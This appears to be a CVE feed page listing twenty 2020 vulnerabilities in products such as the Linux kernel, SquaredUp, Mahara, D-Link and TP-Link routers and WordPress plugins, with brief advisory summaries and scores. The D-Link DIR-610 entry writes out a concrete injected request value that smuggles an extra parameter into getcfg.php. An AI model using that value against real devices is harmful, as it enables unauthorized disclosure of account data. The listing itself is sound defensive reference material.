Latest CVE Feed

  1. Home
  2. Vulnerabilities
  3. Latest
Following is the list of latest published vulnerabilities. You can filter the list based on the severity of the vulnerability, whether it is actively exploited (also known as CISA KEV List) or remotely exploitable. You can also sort the list based on the published date, last updated date, or CVSS score.
Latest Critical Actively Exploited Remotely Exploitable
Published Last Updated CVSS Score

  • 5.5

    MEDIUM
    CVE-2020-9391

    An issue was discovered in the Linux kernel 5.4 and 5.5 through 5.5.6 on the AArch64 architecture. It ignores the top byte in the address passed to the brk system call, potentially moving the memory break downwards when the application expects it to move ... Read more

    • Published: Feb. 25, 2020
    • Modified: Nov. 21, 2024

  • 5.4

    MEDIUM
    CVE-2020-9390

    SquaredUp allowed Stored XSS before version 4.6.0. A user was able to create a dashboard that executed malicious content in iframe or by uploading an SVG that contained a script.... Read more

    Affected Products : squaredup
    • Published: Feb. 03, 2021
    • Modified: Nov. 21, 2024

  • 4.3

    MEDIUM
    CVE-2020-9389

    A username enumeration issue was discovered in SquaredUp before version 4.6.0. The login functionality was implemented in a way that would enable a malicious user to guess valid username due to a different response time from invalid usernames.... Read more

    Affected Products : squaredup
    • Published: Feb. 03, 2021
    • Modified: Nov. 21, 2024

  • 6.5

    MEDIUM
    CVE-2020-9388

    CSRF protection was not present in SquaredUp before version 4.6.0. A CSRF attack could have been possible by an administrator executing arbitrary code in a HTML dashboard tile via a crafted HTML page, or by uploading a malicious SVG payload into a dashboa... Read more

    Affected Products : squaredup
    • Published: Feb. 03, 2021
    • Modified: Nov. 21, 2024

  • 4.3

    MEDIUM
    CVE-2020-9387

    In Mahara 19.04 before 19.04.5 and 19.10 before 19.10.3, account details are shared in the Elasticsearch results for accounts that are not accessible when the config setting 'Isolated institutions' is turned on.... Read more

    Affected Products : mahara
    • Published: Apr. 30, 2020
    • Modified: Nov. 21, 2024

  • 4.3

    MEDIUM
    CVE-2020-9386

    In Mahara 18.10 before 18.10.5, 19.04 before 19.04.4, and 19.10 before 19.10.2, file metadata information is disclosed to group members in the Elasticsearch result list despite them not having access to that artefact anymore.... Read more

    Affected Products : mahara
    • Published: Mar. 09, 2020
    • Modified: Nov. 21, 2024

  • 7.5

    HIGH
    CVE-2020-9385

    A NULL Pointer Dereference exists in libzint in Zint 2.7.1 because multiple + characters are mishandled in add_on in upcean.c, when called from eanx in upcean.c during EAN barcode generation.... Read more

    Affected Products : zint
    • Published: Feb. 25, 2020
    • Modified: Nov. 21, 2024

  • 8.8

    HIGH
    CVE-2020-9384

    An Insecure Direct Object Reference (IDOR) vulnerability in the Change Password feature of Subex ROC Partner Settlement 10.5 allows remote authenticated users to achieve account takeover via manipulation of POST parameters. NOTE: This vulnerability may on... Read more

    Affected Products : roc_partner_settlement
    • Published: Apr. 14, 2020
    • Modified: Nov. 21, 2024

  • 7.1

    HIGH
    CVE-2020-9383

    An issue was discovered in the Linux kernel 3.16 through 5.5.6. set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2.... Read more

    • Published: Feb. 25, 2020
    • Modified: Nov. 21, 2024

  • 5.5

    MEDIUM
    CVE-2020-9382

    An issue was discovered in the Widgets extension through 1.4.0 for MediaWiki. Improper title sanitization allowed for the execution of any wiki page as a widget (as defined by this extension) via MediaWiki's {{#widget:}} parser function.... Read more

    Affected Products : widgets
    • Published: Feb. 24, 2020
    • Modified: Nov. 21, 2024

  • 7.5

    HIGH
    CVE-2020-9381

    controllers/admin.js in Total.js CMS 13 allows remote attackers to execute arbitrary code via a POST to the /admin/api/widgets/ URI. This can be exploited in conjunction with CVE-2019-15954.... Read more

    Affected Products : total.js_cms
    • Published: Feb. 24, 2020
    • Modified: Nov. 21, 2024

  • 9.8

    CRITICAL
    CVE-2020-9380

    IPTV Smarters WEB TV PLAYER through 2020-02-22 allows attackers to execute OS commands by uploading a script.... Read more

    Affected Products : web_tv_player
    • Published: Mar. 05, 2020
    • Modified: Nov. 21, 2024

  • 6.5

    MEDIUM
    CVE-2020-9379

    The Software Development Kit of the MiContact Center Business with Site Based Security 8.0 through 9.0.1.0 before KB496276 allows an authenticated user to access sensitive information. A successful exploit could allow unauthorized access to user conversat... Read more

    Affected Products : micontact_center_business
    • Published: Feb. 25, 2020
    • Modified: Nov. 21, 2024

  • 7.5

    HIGH
    CVE-2020-9376

    D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer... Read more

    Affected Products : dir-610_firmware dir-610
    • Published: Jul. 09, 2020
    • Modified: Nov. 21, 2024

  • 7.8

    HIGH
    CVE-2020-9375

    TP-Link Archer C50 V3 devices before Build 200318 Rel. 62209 allows remote attackers to cause a denial of service via a crafted HTTP Header containing an unexpected Referer field.... Read more

    Affected Products : archer_c50 archer_c5
    • Published: Mar. 25, 2020
    • Modified: Nov. 21, 2024

  • 9.8

    CRITICAL
    CVE-2020-9374

    On TP-Link TL-WR849N 0.9.1 4.16 devices, a remote command execution vulnerability in the diagnostics area can be exploited when an attacker sends specific shell metacharacters to the panel's traceroute feature.... Read more

    Affected Products : tl-wr849n_firmware tl-wr849n
    • Published: Feb. 24, 2020
    • Modified: Nov. 21, 2024

  • 7.8

    HIGH
    CVE-2020-9372

    The Appointment Booking Calendar plugin before 1.3.35 for WordPress allows user input (in fields such as Description or Name) in any booking form to be any formula, which then could be exported via the Bookings list tab in /wp-admin/admin.php?page=cpabc_a... Read more

    Affected Products : appointment_booking_calendar
    • Published: Mar. 04, 2020
    • Modified: Nov. 21, 2024

  • 4.8

    MEDIUM
    CVE-2020-9371

    Stored XSS exists in the Appointment Booking Calendar plugin before 1.3.35 for WordPress. In the cpabc_appointments.php file, the Calendar Name input could allow attackers to inject arbitrary JavaScript or HTML.... Read more

    Affected Products : appointment_booking_calendar
    • Published: Mar. 04, 2020
    • Modified: Nov. 21, 2024

  • 9.1

    CRITICAL
    CVE-2020-9370

    HUMAX HGA12R-02 BRGCAA 1.1.53 devices allow Session Hijacking.... Read more

    Affected Products : hga12r-02_firmware hga12r-02
    • Published: Mar. 05, 2020
    • Modified: Nov. 21, 2024

  • 7.5

    HIGH
    CVE-2020-9369

    Sympa 6.2.38 through 6.2.52 allows remote attackers to cause a denial of service (disk consumption from temporary files, and a flood of notifications to listmasters) via a series of requests with malformed parameters.... Read more

    Affected Products : fedora debian_linux sympa
    • Published: Feb. 24, 2020
    • Modified: Nov. 21, 2024
Showing 20 of 294836 Results